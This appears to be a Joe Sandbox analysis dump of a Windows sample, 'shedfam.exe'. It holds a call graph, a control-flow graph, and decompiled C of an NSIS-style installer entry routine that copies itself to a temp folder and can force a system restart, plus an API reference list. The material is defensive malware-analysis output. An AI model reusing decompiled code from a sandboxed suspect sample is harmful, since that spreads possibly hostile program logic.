40196b 4249->4250 4250->4253 4255 405cfb lstrcpynA 4250->4255 4252 401985 4252->4253 4254 401992 lstrlenA 4252->4254 4254->4253 4255->4252 4256 4019b5 4257 402a0c 18 API calls 4256->4257 4258 4019bc 4257->4258 4259 402a0c 18 API calls 4258->4259 4260 4019c5 4259->4260 4261 4019cc lstrcmpiA 4260->4261 4262 4019de lstrcmpA 4260->4262 4263 4019d2 4261->4263 4262->4263 4264 404936 GetDlgItem GetDlgItem 4265 40498a 7 API calls 4264->4265 4268 404ba7 4264->4268 4266 404a30 DeleteObject 4265->4266 4267 404a23 SendMessageA 4265->4267 4269 404a3b 4266->4269 4267->4266 4287 404c91 4268->4287 4296 404c1b 4268->4296 4317 4048b6 SendMessageA 4268->4317 4270 404a72 4269->4270 4271 405d1d 18 API calls 4269->4271 4272 403fb7 19 API calls 4270->4272 4275 404a54 SendMessageA SendMessageA 4271->4275 4278 404a86 4272->4278 4273 404d40 4276 404d55 4273->4276 4277 404d49 SendMessageA 4273->4277 4274 404b9a 4280 40401e 8 API calls 4274->4280 4275->4269 4288 404d67 ImageList_Destroy 4276->4288 4289 404d6e 4276->4289 4293 404d7e 4276->4293 4277->4276 4283 403fb7 19 API calls 4278->4283 4279 404cea SendMessageA 4279->4274 4285 404cff SendMessageA 4279->4285 4286 404f30 4280->4286 4281 404c83 SendMessageA 4281->4287 4297 404a94 4283->4297 4284 404ee4 4284->4274 4294 404ef6 ShowWindow GetDlgItem ShowWindow 4284->4294 4291 404d12 4285->4291 4287->4273 4287->4274 4287->4279 4288->4289 4292 404d77 GlobalFree 4289->4292 4289->4293 4290 404b68 GetWindowLongA SetWindowLongA 4295 404b81 4290->4295 4302 404d23 SendMessageA 4291->4302 4292->4293 4293->4284 4301 40140b 2 API calls 4293->4301 4310 404db0 4293->4310 4294->4274 4298 404b87 ShowWindow 4295->4298 4299 404b9f 4295->4299 4296->4281 4296->4287 4297->4290 4300 404ae3 SendMessageA 4297->4300 4303 404b62 4297->4303 4306 404b30 SendMessageA 4297->4306 4307 404b1f SendMessageA 4297->4307 4315 403fec SendMessageA 4298->4315 4316 403fec SendMessageA 4299->4316 4300->4297 4301->4310 4302->4273 4303->4290 4303->4295 4306->4297 4307->4297 4308 404eba InvalidateRect 4308->4284 4309 404ed0 4308->4309 4313 404871 21 API calls 4309->4313 4311 404dde SendMessageA 4310->4311 4312 404df4 4310->4312 4311->4312 4312->4308 4314 404e68 SendMessageA SendMessageA 4312->4314 4313->4284 4314->4312 4315->4274 4316->4268 4318 404915 SendMessageA 4317->4318 4319 4048d9 GetMessagePos ScreenToClient SendMessageA 4317->4319 4321 40490d 4318->4321 4320 404912 4319->4320 4319->4321 4320->4318 4321->4296 4322 402036 4323 402a0c 18 API calls 4322->4323 4324 40203d 4323->4324 4325 402a0c 18 API calls 4324->4325 4326 402047 4325->4326 4327 402a0c 18 API calls 4326->4327 4328 402050 4327->4328 4329 402a0c 18 API calls 4328->4329 4330 40205a 4329->4330 4331 402a0c 18 API calls 4330->4331 4332 402064 4331->4332 4333 402078 CoCreateInstance 4332->4333 4334 402a0c 18 API calls 4332->4334 4335 40214d 4333->4335 4336 402097 4333->4336 4334->4333 4337 401423 25 API calls 4335->4337 4338 40217f 4335->4338 4336->4335 4339 40212c MultiByteToWideChar 4336->4339 4337->4338 4339->4335 4340 404f37 4341 404f45 4340->4341 4342 404f5c 4340->4342 4343 404f4b 4341->4343 4358 404fc5 4341->4358 4344 404f6a IsWindowVisible 4342->4344 4350 404f81 4342->4350 4345 404003 SendMessageA 4343->4345 4347 404f77 4344->4347 4344->4358 4348 404f55 4345->4348 4346 404fcb CallWindowProcA 4346->4348 4349 4048b6 5 API calls 4347->4349 4349->4350 4350->4346 4359 405cfb lstrcpynA 4350->4359 4352 404fb0 4360 405c59 wsprintfA 4352->4360 4354 404fb7 4355 40140b 2 API calls 4354->4355 4356 404fbe 4355->4356 4361 405cfb lstrcpynA 4356->4361 4358->4346 4359->4352 4360->4354 4361->4358 4362 4014b7 4363 4014bd 4362->4363 4364 401389 2 API calls 4363->4364 4365 4014c5 4364->4365 4366 402239 4367 402241 4366->4367 4368 402247 4366->4368 4369 402a0c 18 API calls 4367->4369 4370 402a0c 18 API calls 4368->4370 4372 402257 4368->4372 4369->4368 4370->4372 4371 402265 4374 402a0c 18 API calls 4371->4374 4372->4371 4373 402a0c 18 API calls 4372->4373 4373->4371 4375 40226e WritePrivateProfileStringA 4374->4375 4383 40243d 4384 402b16 19 API calls 4383->4384 4385 402447 4384->4385 4386 4029ef 18 API calls 4385->4386 4387 402450 4386->4387 4388 402473 RegEnumValueA 4387->4388 4389 402467 RegEnumKeyA 4387->4389 4391 402672 4387->4391 4390 40248c RegCloseKey 4388->4390 4388->4391 4389->4390 4390->4391 4393 4022bd 4394 4022c2 4393->4394 4395 4022ed 4393->4395 4396 402b16 19 API calls 4394->4396 4397 402a0c 18 API calls 4395->4397 4398 4022c9 4396->4398 4399 4022f4 4397->4399 4400 402a0c 18 API calls 4398->4400 4403 40230a 4398->4403 4404 402a4c RegOpenKeyExA 4399->4404 4401 4022da RegDeleteValueA RegCloseKey 4400->4401 4401->4403 4405 402a77 4404->4405 4411 402ac3 4404->4411 4406 402a9d RegEnumKeyA 4405->4406 4407 402aaf RegCloseKey 4405->4407 4409 402ad4 RegCloseKey 4405->4409 4412 402a4c 5 API calls 4405->4412 4406->4405 4406->4407 4408 406087 5 API calls 4407->4408 4410 402abf 4408->4410 4409->4411 4410->4411 4413 402aef RegDeleteKeyA 4410->4413 4411->4403 4412->4405 4413->4411

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 40324f-403283 SetErrorMode GetVersion 1 403285-40328d call 406087 0->1 2 403296-403326 call 40601d * 3 call 406087 * 2 #17 OleInitialize SHGetFileInfoA call 405cfb GetCommandLineA call 405cfb GetModuleHandleA 0->2 1->2 8 40328f 1->8 20 403332-403347 call 405819 CharNextA 2->20 21 403328-40332d 2->21 8->2 24 4033ac-4033b0 20->24 21->20 25 4033b2 24->25 26 403349-40334c 24->26 29 4033c5-4033dd GetTempPathA call 40321e 25->29 27 403354-40335c 26->27 28 40334e-403352 26->28 30 403364-403367 27->30 31 40335e-40335f 27->31 28->27 28->28 38 4033ff-403416 DeleteFileA call 402c88 29->38 39 4033df-4033fd GetWindowsDirectoryA lstrcatA call 40321e 29->39 33 403369-40336d 30->33 34 40339c-4033a9 call 405819 30->34 31->30 36 40337d-403383 33->36 37 40336f-403378 33->37 34->24 51 4033ab 34->51 43 403393-40339a 36->43 44 403385-40338e 36->44 37->36 41 40337a 37->41 53 40347d-40348c ExitProcess OleUninitialize 38->53 54 403418-40341e 38->54 39->38 39->53 41->36 43->34 49 4033b4-4033c0 call 405cfb 43->49 44->43 48 403390 44->48 48->43 49->29 51->24 55 4035a1-4035a7 53->55 56 403492-4034a2 call 4055bc ExitProcess 53->56 57 403420-403429 call 405819 54->57 58 40346d-403474 call 40374e 54->58 60 403644-40364c 55->60 61 4035ad-4035ca call 406087 * 3 55->61 70 403434-403436 57->70 69 403479 58->69 64 403652-403656 ExitProcess 60->64 65 40364e 60->65 88 403614-403622 call 406087 61->88 89 4035cc-4035ce 61->89 65->64 69->53 72 403438-403442 70->72 73 40342b-403431 70->73 76 403444-403451 call 4058cf 72->76 77 4034a8-4034bc call 405543 lstrcatA 72->77 73->72 75 403433 73->75 75->70 76->53 87 403453-403469 call 405cfb * 2 76->87 85 4034c9-4034e3 lstrcatA lstrcmpiA 77->85 86 4034be-4034c4 lstrcatA 77->86 85->53 91 4034e5-4034e8 85->91 86->85 87->58 99 403630-40363b ExitWindowsEx 88->99 100 403624-40362e 88->100 89->88 93 4035d0-4035d2 89->93 95 4034f1 call 405526 91->95 96 4034ea-4034ef call 4054a9 91->96 93->88 98 4035d4-4035e6 GetCurrentProcess 93->98 108 4034f6-403503 SetCurrentDirectoryA 95->108 96->108 98->88 111 4035e8-40360a 98->111 99->60 107 40363d-40363f call 40140b 99->107 100->99 100->107 107->60 109 403510-40352a call 405cfb 108->109 110 403505-40350b call 405cfb 108->110 118 40352f-40354b call 405d1d DeleteFileA 109->118 110->109 111->88 121 40358c-403593 118->121 122 40354d-40355d CopyFileA 118->122 121->118 123 403595-40359c call 405a49 121->123 122->121 124 40355f-40357f call 405a49 call 405d1d call 40555b 122->124 123->53 124->121 133 403581-403588 CloseHandle 124->133 133->121
                                                                  C-Code - Quality: 77%
                                                                  			_entry_() {
                                                                  				intOrPtr _t40;
                                                                  				CHAR* _t44;
                                                                  				char* _t47;
                                                                  				signed int _t49;
                                                                  				void* _t53;
                                                                  				intOrPtr _t55;
                                                                  				int _t56;
                                                                  				signed int _t59;
                                                                  				signed int _t60;
                                                                  				int _t61;
                                                                  				signed int _t63;
                                                                  				signed int _t66;
                                                                  				int _t83;
                                                                  				void* _t87;
                                                                  				void* _t99;
                                                                  				intOrPtr* _t100;
                                                                  				void* _t103;
                                                                  				CHAR* _t108;
                                                                  				signed int _t109;
                                                                  				signed int _t110;
                                                                  				signed int _t111;
                                                                  				void* _t113;
                                                                  				signed int _t115;
                                                                  				char* _t117;
                                                                  				signed int _t118;
                                                                  				void* _t120;
                                                                  				void* _t121;
                                                                  				char _t138;
                                                                  
                                                                  				 *(_t121 + 0x1c) = 0;
                                                                  				 *((intOrPtr*)(_t121 + 0x14)) = "Error writing temporary file. Make sure your temp folder is valid.";
                                                                  				_t110 = 0;
                                                                  				 *(_t121 + 0x18) = 0x20;
                                                                  				SetErrorMode(0x8001); // executed
                                                                  				if(GetVersion() != 6) {
                                                                  					_t100 = E00406087(0);
                                                                  					if(_t100 != 0) {
                                                                  						 *_t100(0xc00);
                                                                  					}
                                                                  				}
                                                                  				E0040601D("UXTHEME"); // executed
                                                                  				E0040601D("USERENV"); // executed
                                                                  				E0040601D("SETUPAPI"); // executed
                                                                  				E00406087(0xd);
                                                                  				_t40 = E00406087(0xb);
                                                                  				 *0x423f84 = _t40;
                                                                  				__imp__#17();
                                                                  				__imp__OleInitialize(0); // executed
                                                                  				 *0x424038 = _t40;
                                                                  				SHGetFileInfoA(0x41f538, 0, _t121 + 0x34, 0x160, 0); // executed
                                                                  				E00405CFB(0x423780, "NSIS Error");
                                                                  				_t44 = GetCommandLineA();
                                                                  				_t117 = "\"C:\\Users\\hardz\\Desktop\\shedfam.exe\"";
                                                                  				E00405CFB(_t117, _t44);
                                                                  				 *0x423f80 = GetModuleHandleA(0);
                                                                  				_t47 = _t117;
                                                                  				if("\"C:\\Users\\hardz\\Desktop\\shedfam.exe\"" == 0x22) {
                                                                  					 *((char*)(_t121 + 0x14)) = 0x22;
                                                                  					_t47 =  &M0042A001;
                                                                  				}
                                                                  				_t49 = CharNextA(E00405819(_t47,  *((intOrPtr*)(_t121 + 0x14))));
                                                                  				 *(_t121 + 0x1c) = _t49;
                                                                  				while(1) {
                                                                  					_t103 =  *_t49;
                                                                  					_t125 = _t103;
                                                                  					if(_t103 == 0) {
                                                                  						break;
                                                                  					}
                                                                  					__eflags = _t103 - 0x20;
                                                                  					if(_t103 != 0x20) {
                                                                  						L8:
                                                                  						__eflags =  *_t49 - 0x22;
                                                                  						 *((char*)(_t121 + 0x14)) = 0x20;
                                                                  						if( *_t49 == 0x22) {
                                                                  							_t49 = _t49 + 1;
                                                                  							__eflags = _t49;
                                                                  							 *((char*)(_t121 + 0x14)) = 0x22;
                                                                  						}
                                                                  						__eflags =  *_t49 - 0x2f;
                                                                  						if( *_t49 != 0x2f) {
                                                                  							L18:
                                                                  							_t49 = E00405819(_t49,  *((intOrPtr*)(_t121 + 0x14)));
                                                                  							__eflags =  *_t49 - 0x22;
                                                                  							if(__eflags == 0) {
                                                                  								_t49 = _t49 + 1;
                                                                  								__eflags = _t49;
                                                                  							}
                                                                  							continue;
                                                                  						} else {
                                                                  							_t49 = _t49 + 1;
                                                                  							__eflags =  *_t49 - 0x53;
                                                                  							if( *_t49 == 0x53) {
                                                                  								__eflags = ( *(_t49 + 1) | 0x00000020) - 0x20;
                                                                  								if(( *(_t49 + 1) | 0x00000020) == 0x20) {
                                                                  									_t110 = _t110 | 0x00000002;
                                                                  									__eflags = _t110;
                                                                  								}
                                                                  							}
                                                                  							__eflags =  *_t49 - 0x4352434e;
                                                                  							if( *_t49 == 0x4352434e) {
                                                                  								__eflags = ( *(_t49 + 4) | 0x00000020) - 0x20;
                                                                  								if(( *(_t49 + 4) | 0x00000020) == 0x20) {
                                                                  									_t110 = _t110 | 0x00000004;
                                                                  									__eflags = _t110;
                                                                  								}
                                                                  							}
                                                                  							__eflags =  *((intOrPtr*)(_t49 - 2)) - 0x3d442f20;
                                                                  							if( *((intOrPtr*)(_t49 - 2)) == 0x3d442f20) {
                                                                  								 *((intOrPtr*)(_t49 - 2)) = 0;
                                                                  								__eflags = _t49 + 2;
                                                                  								E00405CFB("C:\\Users\\hardz\\AppData\\Local\\Temp", _t49 + 2);
                                                                  								L23:
                                                                  								_t108 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
                                                                  								GetTempPathA(0x400, _t108); // executed
                                                                  								_t53 = E0040321E(_t125);
                                                                  								_t126 = _t53;
                                                                  								if(_t53 != 0) {
                                                                  									L25:
                                                                  									DeleteFileA("1033"); // executed
                                                                  									_t55 = E00402C88(_t127, _t110); // executed
                                                                  									 *((intOrPtr*)(_t121 + 0x10)) = _t55;
                                                                  									if(_t55 != 0) {
                                                                  										L35:
                                                                  										ExitProcess(); // executed
                                                                  										__imp__OleUninitialize(); // executed
                                                                  										_t134 =  *((intOrPtr*)(_t121 + 0x10));
                                                                  										if( *((intOrPtr*)(_t121 + 0x10)) == 0) {
                                                                  											__eflags =  *0x424014;
                                                                  											if( *0x424014 == 0) {
                                                                  												L62:
                                                                  												_t56 =  *0x42402c;
                                                                  												__eflags = _t56 - 0xffffffff;
                                                                  												if(_t56 != 0xffffffff) {
                                                                  													 *(_t121 + 0x18) = _t56;
                                                                  												}
                                                                  												ExitProcess( *(_t121 + 0x18));
                                                                  											}
                                                                  											_t118 = E00406087(5);
                                                                  											_t111 = E00406087(6);
                                                                  											_t59 = E00406087(7);
                                                                  											__eflags = _t118;
                                                                  											_t109 = _t59;
                                                                  											if(_t118 != 0) {
                                                                  												__eflags = _t111;
                                                                  												if(_t111 != 0) {
                                                                  													__eflags = _t109;
                                                                  													if(_t109 != 0) {
                                                                  														_t66 =  *_t118(GetCurrentProcess(), 0x28, _t121 + 0x1c);
                                                                  														__eflags = _t66;
                                                                  														if(_t66 != 0) {
                                                                  															 *_t111(0, "SeShutdownPrivilege", _t121 + 0x24);
                                                                  															 *(_t121 + 0x38) = 1;
                                                                  															 *(_t121 + 0x44) = 2;
                                                                  															 *_t109( *((intOrPtr*)(_t121 + 0x30)), 0, _t121 + 0x28, 0, 0, 0);
                                                                  														}
                                                                  													}
                                                                  												}
                                                                  											}
                                                                  											_t60 = E00406087(8);
                                                                  											__eflags = _t60;
                                                                  											if(_t60 == 0) {
                                                                  												L60:
                                                                  												_t61 = ExitWindowsEx(2, 0x80040002);
                                                                  												__eflags = _t61;
                                                                  												if(_t61 != 0) {
                                                                  													goto L62;
                                                                  												}
                                                                  												goto L61;
                                                                  											} else {
                                                                  												_t63 =  *_t60(0, 0, 0, 0x25, 0x80040002);
                                                                  												__eflags = _t63;
                                                                  												if(_t63 == 0) {
                                                                  													L61:
                                                                  													E0040140B(9);
                                                                  													goto L62;
                                                                  												}
                                                                  												goto L60;
                                                                  											}
                                                                  										}
                                                                  										E004055BC( *((intOrPtr*)(_t121 + 0x14)), 0x200010);
                                                                  										ExitProcess(2);
                                                                  									}
                                                                  									if( *0x423f9c == 0) {
                                                                  										L34:
                                                                  										 *0x42402c =  *0x42402c | 0xffffffff;
                                                                  										 *(_t121 + 0x18) = E0040374E( *0x42402c);
                                                                  										goto L35;
                                                                  									}
                                                                  									_t115 = E00405819(_t117, 0);
                                                                  									while(_t115 >= _t117) {
                                                                  										__eflags =  *_t115 - 0x3d3f5f20;
                                                                  										if(__eflags == 0) {
                                                                  											break;
                                                                  										}
                                                                  										_t115 = _t115 - 1;
                                                                  										__eflags = _t115;
                                                                  									}
                                                                  									_t131 = _t115 - _t117;
                                                                  									 *((intOrPtr*)(_t121 + 0x10)) = "Error launching installer";
                                                                  									if(_t115 < _t117) {
                                                                  										_t113 = E00405543(_t134);
                                                                  										lstrcatA(_t108, "~nsu");
                                                                  										if(_t113 != 0) {
                                                                  											lstrcatA(_t108, "A");
                                                                  										}
                                                                  										lstrcatA(_t108, ".tmp");
                                                                  										_t119 = "C:\\Users\\hardz\\Desktop";
                                                                  										if(lstrcmpiA(_t108, "C:\\Users\\hardz\\Desktop") != 0) {
                                                                  											_push(_t108);
                                                                  											if(_t113 == 0) {
                                                                  												E00405526();
                                                                  											} else {
                                                                  												E004054A9();
                                                                  											}
                                                                  											SetCurrentDirectoryA(_t108);
                                                                  											_t138 = "C:\\Users\\hardz\\AppData\\Local\\Temp"; // 0x43
                                                                  											if(_t138 == 0) {
                                                                  												E00405CFB("C:\\Users\\hardz\\AppData\\Local\\Temp", _t119);
                                                                  											}
                                                                  											E00405CFB(0x425000,  *(_t121 + 0x1c));
                                                                  											 *0x425400 = 0x41;
                                                                  											_t120 = 0x1a;
                                                                  											do {
                                                                  												E00405D1D(0, _t108, 0x41f138, 0x41f138,  *((intOrPtr*)( *0x423f90 + 0x120)));
                                                                  												DeleteFileA(0x41f138);
                                                                  												if( *((intOrPtr*)(_t121 + 0x10)) != 0) {
                                                                  													_t83 = CopyFileA("C:\\Users\\hardz\\Desktop\\shedfam.exe", 0x41f138, 1);
                                                                  													_t140 = _t83;
                                                                  													if(_t83 != 0) {
                                                                  														_push(0);
                                                                  														_push(0x41f138);
                                                                  														E00405A49(_t140);
                                                                  														E00405D1D(0, _t108, 0x41f138, 0x41f138,  *((intOrPtr*)( *0x423f90 + 0x124)));
                                                                  														_t87 = E0040555B(0x41f138);
                                                                  														if(_t87 != 0) {
                                                                  															CloseHandle(_t87);
                                                                  															 *((intOrPtr*)(_t121 + 0x10)) = 0;
                                                                  														}
                                                                  													}
                                                                  												}
                                                                  												 *0x425400 =  *0x425400 + 1;
                                                                  												_t120 = _t120 - 1;
                                                                  												_t142 = _t120;
                                                                  											} while (_t120 != 0);
                                                                  											_push(0);
                                                                  											_push(_t108);
                                                                  											E00405A49(_t142);
                                                                  										}
                                                                  										goto L35;
                                                                  									}
                                                                  									 *_t115 = 0;
                                                                  									_t116 = _t115 + 4;
                                                                  									if(E004058CF(_t131, _t115 + 4) == 0) {
                                                                  										goto L35;
                                                                  									}
                                                                  									E00405CFB("C:\\Users\\hardz\\AppData\\Local\\Temp", _t116);
                                                                  									E00405CFB("C:\\Users\\hardz\\AppData\\Local\\Temp", _t116);
                                                                  									 *((intOrPtr*)(_t121 + 0x10)) = 0;
                                                                  									goto L34;
                                                                  								}
                                                                  								GetWindowsDirectoryA(_t108, 0x3fb);
                                                                  								lstrcatA(_t108, "\\Temp");
                                                                  								_t99 = E0040321E(_t126);
                                                                  								_t127 = _t99;
                                                                  								if(_t99 == 0) {
                                                                  									goto L35;
                                                                  								}
                                                                  								goto L25;
                                                                  							} else {
                                                                  								goto L18;
                                                                  							}
                                                                  						}
                                                                  					} else {
                                                                  						goto L7;
                                                                  					}
                                                                  					do {
                                                                  						L7:
                                                                  						_t49 = _t49 + 1;
                                                                  						__eflags =  *_t49 - 0x20;
                                                                  					} while ( *_t49 == 0x20);
                                                                  					goto L8;
                                                                  				}
                                                                  				goto L23;
                                                                  			}































                                                                  0x00403260
                                                                  0x00403264
                                                                  0x0040326c
                                                                  0x0040326e
                                                                  0x00403273
                                                                  0x00403283
                                                                  0x00403286
                                                                  0x0040328d
                                                                  0x00403294
                                                                  0x00403294
                                                                  0x0040328d
                                                                  0x0040329b
                                                                  0x004032a5
                                                                  0x004032af
                                                                  0x004032b6
                                                                  0x004032bd
                                                                  0x004032c2
                                                                  0x004032c7
                                                                  0x004032ce
                                                                  0x004032d4
                                                                  0x004032ea
                                                                  0x004032fa
                                                                  0x004032ff
                                                                  0x00403305
                                                                  0x0040330c
                                                                  0x0040331f
                                                                  0x00403324
                                                                  0x00403326
                                                                  0x00403328
                                                                  0x0040332d
                                                                  0x0040332d
                                                                  0x0040333d
                                                                  0x00403343
                                                                  0x004033ac
                                                                  0x004033ac
                                                                  0x004033ae
                                                                  0x004033b0
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00403349
                                                                  0x0040334c
                                                                  0x00403354
                                                                  0x00403354
                                                                  0x00403357
                                                                  0x0040335c
                                                                  0x0040335e
                                                                  0x0040335e
                                                                  0x0040335f
                                                                  0x0040335f
                                                                  0x00403364
                                                                  0x00403367
                                                                  0x0040339c
                                                                  0x004033a1
                                                                  0x004033a6
                                                                  0x004033a9
                                                                  0x004033ab
                                                                  0x004033ab
                                                                  0x004033ab
                                                                  0x00000000
                                                                  0x00403369
                                                                  0x00403369
                                                                  0x0040336a
                                                                  0x0040336d
                                                                  0x00403375
                                                                  0x00403378
                                                                  0x0040337a
                                                                  0x0040337a
                                                                  0x0040337a
                                                                  0x00403378
                                                                  0x0040337d
                                                                  0x00403383
                                                                  0x0040338b
                                                                  0x0040338e
                                                                  0x00403390
                                                                  0x00403390
                                                                  0x00403390
                                                                  0x0040338e
                                                                  0x00403393
                                                                  0x0040339a
                                                                  0x004033b4
                                                                  0x004033b7
                                                                  0x004033c0
                                                                  0x004033c5
                                                                  0x004033c5
                                                                  0x004033d0
                                                                  0x004033d6
                                                                  0x004033db
                                                                  0x004033dd
                                                                  0x004033ff
                                                                  0x00403404
                                                                  0x0040340b
                                                                  0x00403412
                                                                  0x00403416
                                                                  0x0040347d
                                                                  0x0040347d
                                                                  0x00403482
                                                                  0x00403488
                                                                  0x0040348c
                                                                  0x004035a1
                                                                  0x004035a7
                                                                  0x00403644
                                                                  0x00403644
                                                                  0x00403649
                                                                  0x0040364c
                                                                  0x0040364e
                                                                  0x0040364e
                                                                  0x00403656
                                                                  0x00403656
                                                                  0x004035b6
                                                                  0x004035bf
                                                                  0x004035c1
                                                                  0x004035c6
                                                                  0x004035c8
                                                                  0x004035ca
                                                                  0x004035cc
                                                                  0x004035ce
                                                                  0x004035d0
                                                                  0x004035d2
                                                                  0x004035e2
                                                                  0x004035e4
                                                                  0x004035e6
                                                                  0x004035f3
                                                                  0x00403602
                                                                  0x0040360a
                                                                  0x00403612
                                                                  0x00403612
                                                                  0x004035e6
                                                                  0x004035d2
                                                                  0x004035ce
                                                                  0x00403616
                                                                  0x0040361b
                                                                  0x00403622
                                                                  0x00403630
                                                                  0x00403633
                                                                  0x00403639
                                                                  0x0040363b
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00403624
                                                                  0x0040362a
                                                                  0x0040362c
                                                                  0x0040362e
                                                                  0x0040363d
                                                                  0x0040363f
                                                                  0x00000000
                                                                  0x0040363f
                                                                  0x00000000
                                                                  0x0040362e
                                                                  0x00403622
                                                                  0x0040349b
                                                                  0x004034a2
                                                                  0x004034a2
                                                                  0x0040341e
                                                                  0x0040346d
                                                                  0x0040346d
                                                                  0x00403479
                                                                  0x00000000
                                                                  0x00403479
                                                                  0x00403427
                                                                  0x00403434
                                                                  0x0040342b
                                                                  0x00403431
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00403433
                                                                  0x00403433
                                                                  0x00403433
                                                                  0x00403438
                                                                  0x0040343a
                                                                  0x00403442
                                                                  0x004034b3
                                                                  0x004034b5
                                                                  0x004034bc
                                                                  0x004034c4
                                                                  0x004034c4
                                                                  0x004034cf
                                                                  0x004034d4
                                                                  0x004034e3
                                                                  0x004034e7
                                                                  0x004034e8
                                                                  0x004034f1
                                                                  0x004034ea
                                                                  0x004034ea
                                                                  0x004034ea
                                                                  0x004034f7
                                                                  0x004034fd
                                                                  0x00403503
                                                                  0x0040350b
                                                                  0x0040350b
                                                                  0x00403519
                                                                  0x00403520
                                                                  0x00403529
                                                                  0x0040352f
                                                                  0x0040353b
                                                                  0x00403541
                                                                  0x0040354b
                                                                  0x00403555
                                                                  0x0040355b
                                                                  0x0040355d
                                                                  0x0040355f
                                                                  0x00403560
                                                                  0x00403561
                                                                  0x00403572
                                                                  0x00403578
                                                                  0x0040357f
                                                                  0x00403582
                                                                  0x00403588
                                                                  0x00403588
                                                                  0x0040357f
                                                                  0x0040355d
                                                                  0x0040358c
                                                                  0x00403592
                                                                  0x00403592
                                                                  0x00403592
                                                                  0x00403595
                                                                  0x00403596
                                                                  0x00403597
                                                                  0x00403597
                                                                  0x00000000
                                                                  0x004034e3
                                                                  0x00403444
                                                                  0x00403446
                                                                  0x00403451
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00403459
                                                                  0x00403464
                                                                  0x00403469
                                                                  0x00000000
                                                                  0x00403469
                                                                  0x004033e5
                                                                  0x004033f1
                                                                  0x004033f6
                                                                  0x004033fb
                                                                  0x004033fd
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040339a
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040334e
                                                                  0x0040334e
                                                                  0x0040334e
                                                                  0x0040334f
                                                                  0x0040334f
                                                                  0x00000000
                                                                  0x0040334e
                                                                  0x00000000

                                                                  APIs
                                                                  • SetErrorMode.KERNELBASE ref: 00403273
                                                                  • GetVersion.KERNEL32 ref: 00403279
                                                                  • #17.COMCTL32(0000000B,0000000D,SETUPAPI,USERENV,UXTHEME), ref: 004032C7
                                                                  • OleInitialize.OLE32(00000000), ref: 004032CE
                                                                  • SHGetFileInfoA.SHELL32(0041F538,00000000,?,00000160,00000000), ref: 004032EA
                                                                  • GetCommandLineA.KERNEL32(00423780,NSIS Error), ref: 004032FF
                                                                  • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\shedfam.exe",00000000), ref: 00403312
                                                                  • CharNextA.USER32(00000000,"C:\Users\user\Desktop\shedfam.exe",00409130), ref: 0040333D
                                                                  • GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004033D0
                                                                  • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004033E5
                                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033F1
                                                                  • DeleteFileA.KERNELBASE(1033), ref: 00403404
                                                                    • Part of subcall function 00406087: GetModuleHandleA.KERNEL32(?,?,00000000,004032BB,0000000D,SETUPAPI,USERENV,UXTHEME), ref: 00406099
                                                                    • Part of subcall function 00406087: GetProcAddress.KERNEL32(00000000,?), ref: 004060B4
                                                                  • ExitProcess.KERNEL32(00000000), ref: 0040347D
                                                                  • OleUninitialize.OLE32(00000000), ref: 00403482
                                                                  • ExitProcess.KERNEL32 ref: 004034A2
                                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\shedfam.exe",00000000,00000000), ref: 004034B5
                                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,004091AC,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\shedfam.exe",00000000,00000000), ref: 004034C4
                                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\shedfam.exe",00000000,00000000), ref: 004034CF
                                                                  • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\shedfam.exe",00000000,00000000), ref: 004034DB
                                                                  • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004034F7
                                                                  • DeleteFileA.KERNEL32(0041F138,0041F138,?,00425000,?), ref: 00403541
                                                                  • CopyFileA.KERNEL32(C:\Users\user\Desktop\shedfam.exe,0041F138,00000001), ref: 00403555
                                                                  • CloseHandle.KERNEL32(00000000,0041F138,0041F138,?,0041F138,00000000), ref: 00403582
                                                                  • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000006,00000005), ref: 004035DB
                                                                  • ExitWindowsEx.USER32 ref: 00403633
                                                                  • ExitProcess.KERNEL32 ref: 00403656
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
